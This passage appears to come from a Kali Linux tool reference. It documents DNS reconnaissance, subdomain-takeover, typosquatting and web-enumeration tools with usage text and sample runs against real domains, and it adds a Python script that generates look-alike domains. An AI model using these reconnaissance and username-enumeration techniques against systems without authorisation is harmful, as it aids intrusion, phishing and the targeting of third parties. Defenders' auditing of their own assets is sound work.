bing: Perform Bing search for subdomains and hosts.
yand: Perform Yandex search for subdomains and hosts.
crt: Perform crt.sh search for subdomains and hosts.
snoop: Perform cache snooping against all NS servers for a given domain, testing
all with file containing the domains, file given with -D option.
tld: Remove the TLD of given domain and test against all TLDs registered in IANA.
zonewalk: Perform a DNSSEC zone walk using NSEC records.
■ Example
root@kali:~# dnsrecon -d example.com -t std
[*] std: Performing General Enumeration against: example.com...
[-] DNSSEC is not configured for example.com
[*] SOA ns.icann.org 199.4.138.53
[*] SOA ns.icann.org 2001:500:89::53
[*] NS a.iana-servers.net 199.43.135.53
[*] Bind Version for 199.43.135.53 3"
[*] NS a.iana-servers.net 2001:500:8f::53
[*] Bind Version for 2001:500:8f::53 3"
[*] NS b.iana-servers.net 199.43.133.53
[*] Bind Version for 199.43.133.53 4"
[*] NS b.iana-servers.net 2001:500:8d::53
[*] Bind Version for 2001:500:8d::53 4"
[*] A example.com 93.184.215.14
[*] AAAA example.com 2606:2800:21f:cb07:6820:80da:af6b:8b2c
[*] TXT example.com v=spf1 -all
[*] TXT example.com wgyf8z8cgvm2qmxpnbnldrcltvk4xqfn
[*] TXT _dmarc.example.com v=DMARC1;p=reject;sp=reject;adkim=s;aspf=s
[*] TXT _dmarc._domainkey.example.com v=DKIM1; p=
[*] Enumerating SRV Records
[-] No SRV Records Found for example.com
dnstracer
Follows the chain of DNS servers to show where a given domain name server (DNS) obtained its information about the given domain.
■ Usage
root@kali:~# dnstracer --help
Usage: dnstracer [options] [host]
-c: disable local caching, default enabled
-C: enable negative caching, default disabled
-o: enable overview of received answers, default disabled
-q <querytype>: query-type to use for the DNS requests, default A
-r <retries>: amount of retries for DNS requests, default 3
-s <server>: use this server for the initial request, default localhost
If . is specified, A.ROOT-SERVERS.NET will be used.
-t <maximum timeout>: Limit time to wait per try
-v: verbose
-S <ip address>: use this source address.
-4: don't query IPv6 servers
■ Example
# Trace with a root server as the destination of the initial request
root@kali:~# dnstracer -s . -4 qiita.com
Tracing to qiita.com[a] via A.ROOT-SERVERS.NET, maximum of 3 retries
A.ROOT-SERVERS.NET [.] (198.41.0.4)
|\___ e.gtld-servers.net [com] (192.12.94.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) Got authoritative answer
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) Got authoritative answer
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) Got authoritative answer
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) Got authoritative answer
|\___ e.gtld-servers.net [com] (2001:0502:1ca1:0000:0000:0000:0000:0030) Not queried
|\___ c.gtld-servers.net [com] (192.26.92.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ c.gtld-servers.net [com] (2001:0503:83eb:0000:0000:0000:0000:0030) Not queried
|\___ a.gtld-servers.net [com] (192.5.6.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ a.gtld-servers.net [com] (2001:0503:a83e:0000:0000:0000:0002:0030) Not queried
|\___ g.gtld-servers.net [com] (192.42.93.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ g.gtld-servers.net [com] (2001:0503:eea3:0000:0000:0000:0000:0030) Not queried
|\___ i.gtld-servers.net [com] (192.43.172.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ i.gtld-servers.net [com] (2001:0503:39c1:0000:0000:0000:0000:0030) Not queried
|\___ m.gtld-servers.net [com] (192.55.83.30)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (205.251.199.164) (cached)
| |\___ ns-1956.awsdns-52.co.uk [qiita.com] (2600:9000:5307:a400:0000:0000:0000:0001) Not queried
| |\___ ns-1049.awsdns-03.org [qiita.com] (205.251.196.25) (cached)
| |\___ ns-1049.awsdns-03.org [qiita.com] (2600:9000:5304:1900:0000:0000:0000:0001) Not queried
| |\___ ns-772.awsdns-32.net [qiita.com] (205.251.195.4) (cached)
| |\___ ns-772.awsdns-32.net [qiita.com] (2600:9000:5303:0400:0000:0000:0000:0001) Not queried
| \___ ns-171.awsdns-21.com [qiita.com] (205.251.192.171) (cached)
|\___ m.gtld-servers.net [com] (2001:0501:b1f9:0000:0000:0000:0000:0030) Not queried
[...]
dnstwist
Generates domains that resemble the given domain using fuzzing algorithms, in order to create and detect look-alike (impersonation) domains.
■ Usage
root@kali:~# dnstwist --help
usage: /usr/bin/dnstwist [OPTION]... DOMAIN
positional arguments:
domain Domain name or URL to scan
options:
-a, --all Print all DNS records instead of the first ones
-b, --banners Determine HTTP and SMTP service banners
-d FILE, --dictionary FILE Generate more domains using dictionary FILE
-f FORMAT, --format FORMAT Output format: cli, csv, json, list (default: cli)
--fuzzers LIST Use only selected fuzzing algorithms (separated with commas)
-g, --geoip Lookup for GeoIP location
--lsh [LSH] Evaluate web page similarity with LSH algorithm: ssdeep, tlsh (default: ssdeep)
--lsh-url URL Override URL to fetch the original web page from
-m, --mxcheck Check if MX host can be used to intercept emails
-o FILE, --output FILE Save output to FILE
-r, --registered Show only registered domain names
-u, --unregistered Show only unregistered domain names
-p, --phash Render web pages and evaluate visual similarity
--phash-url URL Override URL to render the original web page from
--screenshots DIR Save web page screenshots into DIR
-t NUM, --threads NUM Start specified NUM of threads (default: 12)
-w, --whois Lookup WHOIS database for creation date and registrar
--tld FILE Swap TLD for the original domain from FILE
--nameservers LIST DNS or DoH servers to query (separated with commas)
--useragent STRING Set User-Agent STRING (default: Mozilla/5.0 (linux 64-bit) dnstwist/20240812)
■ Example
root@kali:~# dnstwist -r github.com
[...]
permutations: 100.00% of 2406 | found: 156 | eta: 0m 00s | speed: 47 qps
*original github.com 20.27.177.113 NS:dns1.p08.nsone.net MX:alt1.aspmx.l.google.com
addition githubd.com 103.224.212.215 NS:ns1.abovedomains.com MX:park-mx.above.com
addition githubu.com 103.224.212.215 NS:ns1.abovedomains.com MX:park-mx.above.com
addition github4.com 104.143.143.3 NS:a.share-dns.com
addition github6.com 104.21.40.115 2606:4700:3032::ac43:b98a NS:gail.ns.cloudflare.com
addition githubq.com 104.21.49.123 2606:4700:3030::6815:317b NS:drake.ns.cloudflare.com MX:route1.mx.cloudflare.net
[...]
bitsquatting gitjub.com 103.224.182.239 NS:ns1.abovedomains.com MX:park-mx.above.com
bitsquatting gkthub.com 104.21.47.41 2606:4700:3036::6815:2f29 NS:sue.ns.cloudflare.com MX:mx.yandex.ru
bitsquatting withub.com 124.156.195.144 NS:dns3.hichina.com MX:mailserver.purelymail.com
bitsquatting gythub.com 13.248.169.48 NS:ns1.namefind.com
bitsquatting gitiub.com 140.82.10.104 NS:ns1.vultr.com MX:gitiub.com
bitsquatting giphub.com 173.232.29.99 NS:ray.ns.cloudflare.com
[...]
homoglyph gìthub.com 104.21.67.116 2606:4700:3034::ac43:ddd6 NS:angela.ns.cloudflare.com
homoglyph ɡithub.com 107.180.21.235 NS:ns25.domaincontrol.com
homoglyph githuḅ.com 127.0.0.1 NS:adel.ns.cloudflare.com MX:mx.zoho.eu
homoglyph githüb.com 15.197.148.33 NS:ns69.domaincontrol.com
homoglyph gıthub.com 162.213.255.27 NS:dns1.namecheaphosting.com MX:mx1-hosting.jellyfish.systems
homoglyph git1ub.com 172.105.161.56 NS:dns1.registrar-servers.com MX:mx1.privateemail.com
homoglyph githuib.com 185.107.56.57 NS:ns1.weaponizedcow.com
[...]
insertion gituhub.com 103.224.182.246 NS:ns1.abovedomains.com MX:park-mx.above.com
insertion giuthub.com 103.224.182.246 NS:ns1.abovedomains.com MX:park-mx.above.com
insertion ghithub.com 103.224.212.214 NS:ns1.abovedomains.com MX:park-mx.above.com
insertion gifthub.com 13.248.169.48 NS:ns5.afternic.com MX:
insertion githuhb.com 162.210.196.171 NS:ns1.taipandns.com
insertion gitjhub.com 162.210.196.173 NS:ns1.numbatdns.com
[...]
replacement giyhub.com 103.224.182.239 NS:ns1.abovedomains.com MX:park-mx.above.com
replacement githyb.com 103.224.182.244 NS:ns1.abovedomains.com MX:park-mx.above.com
replacement hithub.com 104.21.82.76 2606:4700:3033::ac43:c65b NS:clint.ns.cloudflare.com
replacement g8thub.com 107.161.23.204 NS:ns1.dnsowl.com
replacement gi5hub.com 107.161.23.204 NS:ns1.dnsowl.com
[...]
transposition gtihub.com NS:ns1.dnsowl.com
transposition igthub.com NS:ns1djs.name.com
various githubcom.com 199.59.243.227 NS:ns1.bodis.com
vowel-swap githab.com 162.210.199.65 NS:ns1.koaladns.com
vowel-swap githob.com 173.239.5.6 NS:ns1.expiereddnsmanager.com MX:mx7.githob.com
vowel-swap gethub.com 203.242.255.30 NS:ns.ktnet.co.kr
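The fuzzer names in dnstwist's output above (addition, bitsquatting, homoglyph, insertion, replacement, transposition, vowel-swap) are simple string transformations of the registrable label. The added example below (my code, not dnstwist's) implements each of them for the github.com case from the output, so a team can build the watch-list of look-alikes for its own domain; the QWERTY adjacency and the homoglyph table are deliberately small approximations of dnstwist's, and `fuzz_domain` groups its results by fuzzer name.

```python
from typing import Dict, Set

LABEL_CHARS = "abcdefghijklmnopqrstuvwxyz0123456789-"
VOWELS = "aeiou"
# QWERTY rows; neighbouring keys are derived from their positions (approximates dnstwist's tables).
QWERTY_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]
# Deliberately small homoglyph table (dnstwist ships a much larger one).
HOMOGLYPHS: Dict[str, str] = {
    "a": "àáâä", "b": "ḅ", "e": "èéê", "g": "ɡ", "i": "ìíıl1", "o": "0òóö", "u": "üùú",
}
FUZZERS = ("addition", "bitsquatting", "homoglyph", "insertion",
           "replacement", "transposition", "vowel-swap")


def adjacent_keys(ch: str) -> str:
    """Keys physically next to `ch` on a QWERTY keyboard (same row plus the rows above and below)."""
    for r, row in enumerate(QWERTY_ROWS):
        i = row.find(ch)
        if i < 0:
            continue
        keys = row[max(i - 1, 0):i] + row[i + 1:i + 2]
        if r > 0:
            keys += QWERTY_ROWS[r - 1][i:i + 2]
        if r + 1 < len(QWERTY_ROWS):
            keys += QWERTY_ROWS[r + 1][max(i - 1, 0):i + 1]
        return keys
    return ""


def valid_label(label: str) -> bool:
    """Reject labels a registry would not accept: empty, or a hyphen at either end."""
    return bool(label) and not label.startswith("-") and not label.endswith("-")


def fuzz_domain(domain: str) -> Dict[str, Set[str]]:
    """Generate look-alike domains for the first label of `domain`, grouped by fuzzer name."""
    label, _, rest = domain.partition(".")
    tld = "." + rest if rest else ""
    out: Dict[str, Set[str]] = {name: set() for name in FUZZERS}

    def emit(kind: str, new_label: str) -> None:
        if new_label != label and valid_label(new_label):
            out[kind].add(new_label + tld)

    for c in LABEL_CHARS:
        emit("addition", label + c)                      # githubd.com
    for i, ch in enumerate(label):
        head, tail = label[:i], label[i + 1:]
        # bitsquatting: one flipped bit in the character's ASCII code (gitjub, withub)
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit))
            if flipped in LABEL_CHARS:
                emit("bitsquatting", head + flipped + tail)
        for g in HOMOGLYPHS.get(ch, ""):
            emit("homoglyph", head + g + tail)           # gìthub
        for k in adjacent_keys(ch):
            emit("insertion", head + k + ch + tail)      # fat-finger before the key (gifthub)
            emit("insertion", head + ch + k + tail)      # ... or after it
            emit("replacement", head + k + tail)         # neighbouring key instead (giyhub)
        if tail and tail[0] != ch:
            emit("transposition", head + tail[0] + ch + tail[1:])   # gtihub
        if ch in VOWELS:
            for v in VOWELS:
                emit("vowel-swap", head + v + tail)      # githab; emit() drops the unchanged label
    return out


def to_ascii(domain: str) -> str:
    """IDNA-encode so Unicode homoglyph candidates can be fed to an ordinary DNS lookup."""
    return domain.encode("idna").decode("ascii")


if __name__ == "__main__":
    for kind, names in fuzz_domain("github.com").items():
        print(f"{kind:14s} {len(names):4d}  e.g. {sorted(names)[0]}")
```

Resolving the generated names (and looking up MX records, as the output above shows) is what turns the list into a monitoring feed; the sets returned here are only the candidates.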
dnsx
Provides features such as DNS record lookups and subdomain brute forcing.
■ Usage
root@kali:~# dnsx --help
Usage:
dnsx [flags]
Flags:
INPUT:
-l, -list string list of sub(domains)/hosts to resolve (file or stdin)
-d, -domain string list of domain to bruteforce (file or comma separated or stdin)
-w, -wordlist string list of words to bruteforce (file or comma separated or stdin)
QUERY:
-a query A record (default)
-aaaa query AAAA record
-cname query CNAME record
-ns query NS record
-txt query TXT record
-srv query SRV record
-ptr query PTR record
-mx query MX record
-soa query SOA record
-axfr query AXFR
-caa query CAA record
FILTER:
-re, -resp display dns response
-ro, -resp-only display dns response only
-rc, -rcode string filter result by dns status code (eg. -rcode noerror,servfail,refused)
PROBE:
-cdn display cdn name
-asn display host asn information
RATE-LIMIT:
-t, -threads int number of concurrent threads to use (default 100)
-rl, -rate-limit int number of dns request/second to make (disabled as default) (default -1)
UPDATE:
-up, -update update dnsx to latest version
-duc, -disable-update-check disable automatic dnsx update check
OUTPUT:
-o, -output string file to write output
-json write output in JSONL(ines) format
DEBUG:
-hc, -health-check run diagnostic check up
-silent display only results in the output
-v, -verbose display verbose output
-raw, -debug display raw dns response
-stats display stats of the running scan
-version display version of dnsx
OPTIMIZATION:
-retry int number of dns attempts to make (must be at least 1) (default 2)
-hf, -hostsfile use system host file
-trace perform dns tracing
-trace-max-recursion int Max recursion for dns trace (default 32767)
-resume resume existing scan
-stream stream mode (wordlist, wildcard, stats and stop/resume will be disabled)
CONFIGURATIONS:
-r, -resolver string list of resolvers to use (file or comma separated)
-wt, -wildcard-threshold int wildcard filter threshold (default 5)
-wd, -wildcard-domain string domain name for wildcard filtering (other flags will be ignored - only json output is supported)
■ Example
# Append A-record information to the list of amazonaws.com subdomains
root@kali:~# subfinder -silent -d amazonaws.com | dnsx -silent -a -resp
a323fac12b391484da5fea5d8d424c9f-c145ad03356b1979.elb.af-south-1.amazonaws.com [13.244.236.13]
a323fac12b391484da5fea5d8d424c9f-c145ad03356b1979.elb.af-south-1.amazonaws.com [13.244.237.113]
a323fac12b391484da5fea5d8d424c9f-c145ad03356b1979.elb.af-south-1.amazonaws.com [13.244.249.223]
acm-cws.af-south-1.amazonaws.com [13.246.73.207]
acm-cws.af-south-1.amazonaws.com [13.246.246.221]
acm-cws.af-south-1.amazonaws.com [13.247.40.65]
aatb.us-gov-west-1.amazonaws.com [52.119.209.92]
a0e559146bc8148018f27b1c3affa444-8f41ca81b59b99d8.elb.af-south-1.amazonaws.com [13.246.88.96]
a0e559146bc8148018f27b1c3affa444-8f41ca81b59b99d8.elb.af-south-1.amazonaws.com [13.246.210.124]
a0e559146bc8148018f27b1c3affa444-8f41ca81b59b99d8.elb.af-south-1.amazonaws.com [13.245.156.147]
acm.eu-west-1.amazonaws.com [3.253.219.235]
[...]
Fierce
Scans DNS for the specified domain to locate non-contiguous IP space and hostnames.
■ Usage
root@kali:~# fierce --help
usage: fierce [-h] [--domain DOMAIN] [--connect] [--wide] [--traverse TRAVERSE] [--search SEARCH [SEARCH ...]] [--range RANGE] [--delay DELAY]
[--subdomains SUBDOMAINS [SUBDOMAINS ...] | --subdomain-file SUBDOMAIN_FILE] [--dns-servers DNS_SERVERS [DNS_SERVERS ...] | --dns-file DNS_FILE]
[--tcp]
A DNS reconnaissance tool for locating non-contiguous IP space.
options:
-h, --help show this help message and exit
--domain DOMAIN domain name to test
--connect attempt HTTP connection to non-RFC 1918 hosts
--wide scan entire class c of discovered records
--traverse TRAVERSE scan IPs near discovered records, this won't enter adjacent class c's
--search SEARCH [SEARCH ...]
filter on these domains when expanding lookup
--range RANGE scan an internal IP range, use cidr notation
--delay DELAY time to wait between lookups
--subdomains SUBDOMAINS [SUBDOMAINS ...]
use these subdomains
--subdomain-file SUBDOMAIN_FILE
use subdomains specified in this file (one per line)
--dns-servers DNS_SERVERS [DNS_SERVERS ...]
use these dns servers for reverse lookups
--dns-file DNS_FILE use dns servers specified in this file for reverse lookups (one per line)
--tcp use TCP instead of UDP
■ Example
root@kali:~# fierce --domain yahoo.co.jp
NS: ns02.yahoo.co.jp. ns11.yahoo.co.jp. ns12.yahoo.co.jp. ns01.yahoo.co.jp.
SOA: yahoo.co.jp. (182.22.31.124)
Zone: failure
Wildcard: failure
Found: accounts.yahoo.co.jp. (183.79.253.220)
Found: ads.yahoo.co.jp. (183.79.218.174)
Found: affiliate.yahoo.co.jp. (124.83.185.124)
Found: am.yahoo.co.jp. (124.83.185.124)
Found: app.yahoo.co.jp. (124.83.185.124)
Found: bb.yahoo.co.jp. (124.83.185.124)
Found: biz.yahoo.co.jp. (124.83.185.124)
Found: business.yahoo.co.jp. (124.83.185.124)
Found: calendar.yahoo.co.jp. (183.79.253.220)
Found: cms.yahoo.co.jp. (100.101.225.12)
Found: developer.yahoo.co.jp. (183.79.250.251)
[...]
Found: photos.yahoo.co.jp. (182.22.24.252)
Found: pm.yahoo.co.jp. (182.22.24.252)
Found: pr.yahoo.co.jp. (182.22.24.252)
Found: privacy.yahoo.co.jp. (182.22.24.252)
Found: promo.yahoo.co.jp. (182.22.24.252)
MassDNS
A DNS stub resolver that can resolve a large number of domain names at high speed.
■ Usage
root@kali:~# massdns --help
Usage: massdns [options] [domainlist]
-b --bindto Bind to IP address and port. (Default: 0.0.0.0:0)
--busy-poll Use busy-wait polling instead of epoll.
-c --resolve-count Number of resolves for a name before giving up. (Default: 50)
--drop-group Group to drop privileges to when running as root. (Default: nogroup)
--drop-user User to drop privileges to when running as root. (Default: nobody)
--filter Only output packets with the specified response code.
--flush Flush the output file whenever a response was received.
-h --help Show this help.
--ignore Do not output packets with the specified response code.
-i --interval Interval in milliseconds to wait between multiple resolves of the same
domain. (Default: 500)
-l --error-log Error log file path. (Default: /dev/stderr)
--norecurse Use non-recursive queries. Useful for DNS cache snooping.
-o --output Flags for output formatting.
--predictable Use resolvers incrementally. Useful for resolver tests.
--processes Number of processes to be used for resolving. (Default: 1)
-q --quiet Quiet mode.
--rcvbuf Size of the receive buffer in bytes.
--retry Unacceptable DNS response codes. (Default: REFUSED)
-r --resolvers Text file containing DNS resolvers.
--root Do not drop privileges when running as root. Not recommended.
-s --hashmap-size Number of concurrent lookups. (Default: 10000)
--sndbuf Size of the send buffer in bytes.
--status-format Format for real-time status updates, json or ansi (Default: ansi)
--sticky Do not switch the resolver when retrying.
--socket-count Socket count per process. (Default: 1)
-t --type Record type to be resolved. (Default: A)
--verify-ip Verify IP addresses of incoming replies.
-w --outfile Write to the specified output file instead of standard output.
Output flags:
S - simple text output
F - full text output
B - binary output
J - ndjson output
Advanced flags for the simple output mode:
d - Include records from the additional section.
i - Indent any reply record.
l - Separate replies using a line feed.
m - Only output reply records that match the question name.
n - Include records from the answer section.
q - Print the question.
r - Print the question with resolver IP address, Unix timestamp and return code prepended.
s - Separate packet sections using a line feed.
t - Include TTL and record class within the output.
u - Include records from the authority section.
■ Example
root@kali:~# massdns --resolvers resolvers.txt gov-domains.txt --outfile results.txt
Processed queries: 410
Received packets: 553
Progress: 100.00% (00 h 00 min 08 sec / 00 h 00 min 08 sec)
Current incoming rate: 16 pps, average: 68 pps
Current success rate: 16 pps, average: 50 pps
Finished total: 410, success: 410 (100.00%)
[...]
Response: | Success: | Total:
OK: | 323 ( 78.78%) | 410 ( 74.14%)
NXDOMAIN: | 75 ( 18.29%) | 85 ( 15.37%)
SERVFAIL: | 12 ( 2.93%) | 18 ( 3.25%)
REFUSED: | 0 ( 0.00%) | 40 ( 7.23%)
FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
root@kali:~# cat results.txt
;; Server: 172.64.37.8:53
;; Size: 104
;; Unix time: 1729577020
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43092
;; flags: qr rd ra ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
koeki-info.go.jp. IN A
;; AUTHORITY SECTION:
koeki-info.go.jp. 900 IN SOA ns000.d-53.net. dns-managers.iij.ad.jp. 217 3600 600 604800 900
;; Server: 172.64.37.38:53
;; Size: 108
;; Unix time: 1729577020
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18513
;; flags: qr rd ra ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
fsc.go.jp. IN A
;; AUTHORITY SECTION:
fsc.go.jp. 900 IN SOA ns-491.awsdns-61.com. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
[...]
Subjack
Checks whether the specified subdomains are vulnerable to subdomain takeover.
Reference
■ Usage
root@kali:~# subjack --help
Usage of subjack:
-a Find those hidden gems by sending requests to every URL. (Default: Requests are only sent to URLs with identified CNAMEs).
-c string
Path to configuration file. (default "/usr/share/subjack/fingerprints.json")
-d string
Domain.
-m Flag the presence of a dead record, but valid CNAME entry.
-o string
Output results to file (Subjack will write JSON if file ends with '.json').
-ssl
Force HTTPS connections (May increase accuracy (Default: http://).
-t int
Number of concurrent threads (Default: 10). (default 10)
-timeout int
Seconds to wait before connection timeout (Default: 10). (default 10)
-v Display more information per each request.
-w string
Path to wordlist.
■ Example
# Build the list of subdomains to investigate
root@kali:~# curl -N -G https://api.merklemap.com/search?query=*.*****.jp | jq -r '.results[].domain' | sed 's/\*\.//' | anew | sort > domains.txt
# Run the check against the subdomain list
root@kali:~# subjack -w domains.txt -t 30 -timeout 30 -ssl -v 3
[Not Vulnerable] api.geocoder.address-br.*****.jp
[Not Vulnerable] dmp-official-staging.*****.jp
[Not Vulnerable] dmp-official.*****.jp
[Not Vulnerable] dmp-official-dev.*****.jp
[Not Vulnerable] external.id.mykey.*****.jp
[Not Vulnerable] geocoder.address-br.*****.jp
[Not Vulnerable] id.mykey.*****.jp
[Not Vulnerable] lcm.stg.smp.*****.jp
[Not Vulnerable] lcm.smp.*****.jp
[Not Vulnerable] lcm.tst.smp.*****.jp
[Not Vulnerable] snas.*****.jp
[Not Vulnerable] dv.emc.*****.jp
[Not Vulnerable] dv.emc.*****.jp
[Not Vulnerable] api.register.deve-gkpb.*****.jp
[Not Vulnerable] api.register.deve-gkpb.*****.jp
[Not Vulnerable] api.kktg.*****.jp
[...]
URLCrazy
Generates domains similar to the specified domain using fuzzing algorithms, in order to generate and detect look-alike (typosquatting) domains.
■ Usage
root@kali:~# urlcrazy --help
Usage: ./urlcrazy [options] domain
Options
-k, --keyboard=LAYOUT Options are: qwerty, azerty, qwertz, dvorak (default: qwerty)
-p, --popularity Check domain popularity with Google
-r, --no-resolve Do not resolve DNS
-i, --show-invalid Show invalid domain names
-f, --format=TYPE Human readable, JSON, or CSV (default: human readable)
-o, --output=FILE Output file
-n, --nocolor Disable colour
-d, --debug Enable debugging output for development
-h, --help This help
-v, --version Print version information. This version is 0.7.3
■ Example
root@kali:~# urlcrazy github.com
URLCrazy Domain Report
Domain : github.com
Keyboard : qwerty
At : 2024-11-27 22:21:30 +0000
# Please wait. 2028 hostnames to process
Typo Type Typo Domain IP Country NameServer
MailServer
-----------------------------------------------------------------------------------------------------------------------------------------
Original github.com 20.27.177.113 UNITED STATES (US) dns4.p08.nsone.net.
aspmx.l.google.com.
Character Omission gihub.com 192.198.80.150 UNITED STATES (US) ns1.smtmdns.com.
Character Omission githb.com 82.192.82.225 NETHERLANDS (NL) ns2.kirklanddc.com.
mail.h-email.net.
[...]
Character Repeat ggithub.com
Character Repeat giithub.com 199.59.243.227 UNITED STATES (US) ns2.bodis.com.
[...]
Character Swap gihtub.com
Character Swap githbu.com 199.115.115.116 UNITED STATES (US) ns2.weaponizedcow.com.
[...]
Character Replacement fithub.com 5.22.145.16 GERMANY (DE) ns3.monikerdns.net.
aspmx.l.google.com.
Character Replacement girhub.com 173.239.5.6 UNITED STATES (US) ns1.expiereddnsmanager.com.
mx7.girhub.com.
[...]
Character Insertion gfithub.com 46.166.189.98 NETHERLANDS (NL) ns-usa.topdns.com.
Character Insertion ghithub.com 103.224.212.214 AUSTRALIA (AU) ns16.abovedomains.com.
park-mx.above.com.
[...]
Vowel Swap gathub.com 216.250.120.46 UNITED STATES (US) ns1028.ui-dns.biz.
mx01.ionos.com.
Vowel Swap gethub.com 203.242.255.30 KOREA REPUBLIC OF (KR) snsp.ktnet.co.kr.
[...]
Bit Flipping gidhub.com ulla.ns.cloudflare.com.
Bit Flipping giphub.com
[...]
Wrong TLD github.xxx
Wrong TLD github.xyz
[...]
Web Crawling
apache-users
Performs a username enumeration attack against servers with Apache mod_userdir enabled to obtain a list of the system's user names.
■ Usage
root@kali:~# apache-users --help
USAGE: apache-users [-h 1.2.3.4] [-l names] [-p 80] [-s (SSL Support 1=true 0=false)] [-e 403 (http code)] [-t threads]
■ Example
# When the specified user exists but the web server has no access permission to the user's home directory,
# a 403 status code is returned, so 403 is used to confirm whether the user exists
root@kali:~# apache-users -h 192.168.11.4 -l users.txt -p 80 -s 0 -e 403 -t 10
hello exists on 192.168.11.4
Arjun
Detects query parameters accepted by an API endpoint, based on a wordlist.
■ Usage
root@kali:~# arjun --help
usage: arjun [-h] [-u URL] [-o JSON_FILE] [-oT TEXT_FILE] [-oB [BURP_PROXY]] [-d DELAY] [-t THREADS] [-w WORDLIST] [-m METHOD]
[-i [IMPORT_FILE]] [-T TIMEOUT] [-c CHUNKS] [-q] [--rate-limit RATE_LIMIT] [--headers [HEADERS]]
[--passive [PASSIVE]] [--stable] [--include INCLUDE] [--disable-redirects]
options:
-h, --help show this help message and exit
-u URL Target URL
-o JSON_FILE, -oJ JSON_FILE
Path for json output file.
-oT TEXT_FILE Path for text output file.
-oB [BURP_PROXY] Output to Burp Suite Proxy. Default is 127.0.0.1:8080.
-d DELAY Delay between requests in seconds. (default: 0)
-t THREADS Number of concurrent threads. (default: 5)
-w WORDLIST Wordlist file path. (default: {arjundir}/db/large.txt)
-m METHOD Request method to use: GET/POST/XML/JSON/HEADERS. (default: GET)
-i [IMPORT_FILE] Import target URLs from file.
-T TIMEOUT HTTP request timeout in seconds. (default: 15)
-c CHUNKS Chunk size. The number of parameters to be sent at once
-q Quiet mode. No output.
--rate-limit RATE_LIMIT
Max number of requests to be sent out per second (default: 9999)
--headers [HEADERS] Add headers. Separate multiple headers with a new line.
--passive [PASSIVE] Collect parameter names from passive sources like wayback, commoncrawl and otx.
--stable Prefer stability over speed.
--include INCLUDE Include this data in every request.
--disable-redirects disable redirects
■ Example
# Detect query parameters using the default wordlist
root@kali:~# arjun -u http://192.168.11.4/customers
[...]
[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Analysing HTTP response for potential parameter names
[*] Logicforcing the URL endpoint
[✓] parameter detected: email, based on: body length
[✓] parameter detected: object, based on: body length
[✓] parameter detected: q, based on: body length
[✓] parameter detected: created, based on: body length
[✓] parameter detected: discount, based on: body length
[✓] parameter detected: metadata, based on: body length
[✓] parameter detected: description, based on: body length
[✓] parameter detected: callback, based on: body length
[✓] parameter detected: balance, based on: body length
[✓] parameter detected: name, based on: body length
[✓] parameter detected: currency, based on: body length
[✓] parameter detected: id, based on: body length
[✓] parameter detected: shipping, based on: body length
[✓] parameter detected: phone, based on: body length
